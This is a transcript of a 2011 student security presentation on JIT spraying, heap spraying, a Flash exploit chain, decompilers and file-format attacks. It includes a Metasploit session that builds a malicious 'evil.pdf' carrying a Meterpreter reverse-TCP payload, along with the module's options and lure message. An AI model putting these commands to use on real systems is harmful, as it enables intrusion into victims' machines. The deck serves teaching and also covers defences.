Presentation is loading. Please wait.

Presentation is loading. Please wait.

Jonathan Friedman Max Goldman Brian Lange Josiah Matlack Aaron Steinfeld November 29, 2011.

Published byAugusta Hensley Modified over 9 years ago

Similar presentations

Presentation on theme: "Jonathan Friedman Max Goldman Brian Lange Josiah Matlack Aaron Steinfeld November 29, 2011."— Presentation transcript:

1 Jonathan Friedman Max Goldman Brian Lange Josiah Matlack Aaron Steinfeld November 29, 2011

2  JIT Spraying  Heap Spraying  Application-specific Exploits  Decompilers  File Format Vulnerabilities  Demo

3  Introduced by Dionysus Blazakis in 2010  Designed to overcome ASLR and DEP  JIT is executable  “Spraying” covers the heap in exploit code  Used in ActionScript code  Predictable address space layout  Used by implementing the xor operation

4  var y = (  0x3c54d0d9 ^  0x3c909058 ^  0x3c59f46a ^  0x3c90c801 ^  0x3c9030d9 ^  0x3c53535b  ) 03470069B8 D9D0543CMOV EAX,3C54D0D9 0347006E 35 5890903CXOR EAX,3C909058 03470073 35 6AF4593CXOR EAX,3C59F46A 0347007835 01C8903CXOR EAX,3C90C801 0347007D 35 D930903C XOR EAX,3C9030D9 03470082 35 5B53533CXOR EAX,3C53535B

5  var y = (  0x3c54d0d9 ^  0x3c909058 ^  0x3c59f46a ^  0x3c90c801 ^  0x3c9030d9 ^  0x3c53535b  ) 0347006A D9D0 FNOP 0347006C 54 PUSH ESP 0347006D 3C 35 CMP AL, 35 0347006F 58 POP EAX 03470070 90 NOP 03470071 90 NOP 03470072 3C 35 CMP AL, 35 03470074 6A F4 PUSH -0C 03470076 59 POP ECX 03470077 3C 35 CMP AL, 35 03470079 01C8 ADD EAX, ECX 0347007B 90 NOP 0347007C 3C 35 CMP AL, 35 0347007E D930 FSTENV DS:[EAX ]

6  Defenses exist  Signature detection ▪ Looks for NOPs ▪ High false-positive rate  Heuristics ▪ Look at xored values ▪ Stateful ▪ Look for short jumps

7  Modified heap overflow technique used to overcome address space randomization  Allocates “blocks” throughout heap containing a nop sled followed by malicious code  Increases the chance of malicious code being executed

8

9  Developed by Microsoft Research in 2008  Defends against heap spraying by: 1. Scanning each individual object on heap, looking for nop slides followed by shellcode 2. Looking for heaps with a high proportion of malicious objects

10  Exploit a vulnerability specific to an application to corrupt memory  Can be quite complex and difficult to prevent or debug  In order to help prevent these exploits, code should be tested extensively  Error codes are your friend  Check them

11  Example: Adobe Flash  Can set a parameter to a negative value  Guarantees a failed allocation whose return value is never checked  The program does pointer arithmetic between this (now NULL) pointer and a user input value  Allows user to write to memory  But, this isn’t directly useful because the value written is only marginally of the hacker’s choosing  So what do we do?

12  Example (cont): ActionScript VM  Can also execute ActionScript from a Flash file  ActionScript VM verifies its input by using bitmasks from memory, but then executes them directly  Overwriting these bitmasks with the previous exploit allows us to execute unverified code  Now save the EIP, replace it with selected pointer, and execute a return to jump to that pointer (presumably at some shellcode loaded in the Flash file)  Then, restore the saved EIP and return like nothing happened

13  Decode the binary-file format  Decode the machine instructions into assembly code for that machine  Perform semantic analysis to recover some low-level data types such as long variables, and to simplify the decoded instructions based on their semantics

14  Store the information in a suitable intermediate representation If a suitable intermediate language is used, the next 2 steps can be used with any assembly language to generate any procedural HLL code.  Perform data flow analysis to remove low- level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.

15  Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level)  Perform type analysis to recover HLL data types such as arrays and structures.  Generate HLL code from the transformed intermediate code.

16

17 In the news…  Duqu  Installer recently found in the form of a.doc file  iOS Jailbreaks  Have taken advantage of PDF and TIFF handling vulnerabilities

18 At their most abstract level: Things handle files. Specially craft the file, and you may be able to manipulate the thing. Programs, OSs Crash, reverse engineer, execute arbitrary code Documents, images, videos

19 1. They’re more stealthy. 2.They’re getting easier to do.

20  File Format fuzzers  4f and Metasploit  Brute-force approach  Metasploit can also be used to automate attacks as usual for kids!

21 1. Don’t be stupid. 2. Client-side antivirus 3. Keeping software up to date

22  Metasploit can inject executable code into a.pdf file, which will launch on startup  Exploited on Windows XP SP3, with Adobe Reader 8.0 and below  Also works on Foxit Reader  After exploiting the.pdf, the.exe injection will run automatically

23  msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp  PAYLOAD => windows/meterpreter/reverse_tcp  msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost  LHOST => localhost  smsf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf  INFILENAME => test.pdf  msf exploit(adobe_pdf_embedded_exe) > exploit  [*] Started reverse handler  [*] Reading in 'test.pdf'...  [*] Parseing 'test.pdf'...  [*] Parseing Successfull.  [*] Using 'windows/meterpreter/reverse_tcp' as payload...  [*] Creating 'evil.pdf' file...  [*] Generated output file /home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf  [*] Exploit completed, but no session was created.

24  EXENAMEThe Name of payload exe.  FILENAMEThe output filename. (default: evil.pdf)  INFILENAMEThe Input PDF filename.  LAUNCH_MESSAGEThe message to display in the File: area (default: To view the encrypted content please tick the "Do not show this message again" box and press Open.)  ContextInformationFileThe information file that contains context information  DisablePayloadHandlerDisable the handler code for the selected payload  EXE::CustomUse custom exe instead of automatically generating a payload exe  EXE::FallBackUse the default template in case the specified one is missing  EXE::InjectSet to preserve the original EXE function  EXE::OldMethodSet to use the substitution EXE generation method.  EXE::PathThe directory in which to look for the executable template  EXE::TemplateThe executable template file name.  EnableContextEncodingUse transient context when encoding payloads  VERBOSEEnable detailed status messages  WORKSPACESpecify the workspace for this module  WfsDelayAdditional delay when waiting for a session

25

Download ppt "Jonathan Friedman Max Goldman Brian Lange Josiah Matlack Aaron Steinfeld November 29, 2011."

Similar presentations

Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.

Defenses. Preventing hijacking attacks 1. Fix bugs: – Audit software Automated tools: Coverity, Prefast/Prefix. – Rewrite software in a type safe languange.
R4 Dynamically loading processes. Overview R4 is closely related to R3, much of what you have written for R3 applies to R4 In R3, we executed procedures.

R4 Dynamically loading processes. Overview R4 is closely related to R3, much of what you have written for R3 applies to R4 In R3, we executed procedures.
Assembly Language for x86 Processors 6th Edition Chapter 5: Procedures (c) Pearson Education, 2010. All rights reserved. You may modify and copy this slide.

Assembly Language for x86 Processors 6th Edition Chapter 5: Procedures (c) Pearson Education, All rights reserved. You may modify and copy this slide.
David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.

David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
Slide 1CPU Emulator Tutorial This program is part of the software suite that accompanies the book The Digital Core, by Noam Nisan and Shimon Schocken 2003,

Slide 1CPU Emulator Tutorial This program is part of the software suite that accompanies the book The Digital Core, by Noam Nisan and Shimon Schocken 2003,
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.

Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.

Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
Utilizing the GDB debugger to analyze programs Background and application.

Utilizing the GDB debugger to analyze programs Background and application.
RIVERSIDE RESEARCH INSTITUTE Helikaon Linux Debugger: A Stealthy Custom Debugger For Linux Jason Raber, Team Lead - Reverse Engineer.

RIVERSIDE RESEARCH INSTITUTE Helikaon Linux Debugger: A Stealthy Custom Debugger For Linux Jason Raber, Team Lead - Reverse Engineer.
Nozzle: A Defense Against Heap Spraying Attacks Ben Livshits Paruj Ratanaworabhan Ben Zorn.

Nozzle: A Defense Against Heap Spraying Attacks Ben Livshits Paruj Ratanaworabhan Ben Zorn.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Joshua Mason, Sam Small Johns Hopkins University Fabian Monrose University of North Carolina Greg MacManus iSIGHT Partners 16th ACM CCS.

Joshua Mason, Sam Small Johns Hopkins University Fabian Monrose University of North Carolina Greg MacManus iSIGHT Partners 16th ACM CCS.
CPSC 325 - Compiler Tutorial 8 Code Generator (unoptimized)

CPSC Compiler Tutorial 8 Code Generator (unoptimized)
Nozzle: A Defense Against Heap-spraying Code Injection Attacks Paruj Ratanaworabhan, Cornell University Ben Livshits and Ben Zorn, Microsoft Research (Redmond,

Nozzle: A Defense Against Heap-spraying Code Injection Attacks Paruj Ratanaworabhan, Cornell University Ben Livshits and Ben Zorn, Microsoft Research (Redmond,
Run time vs. Compile time

Run time vs. Compile time
1 Run time vs. Compile time The compiler must generate code to handle issues that arise at run time Representation of various data types Procedure linkage.

1 Run time vs. Compile time The compiler must generate code to handle issues that arise at run time Representation of various data types Procedure linkage.
Lecture 16 Buffer Overflow

Lecture 16 Buffer Overflow
Efficient Instruction Set Randomization Using Software Dynamic Translation Michael Crane Wei Hu.

Efficient Instruction Set Randomization Using Software Dynamic Translation Michael Crane Wei Hu.

Similar presentations

Ads by Google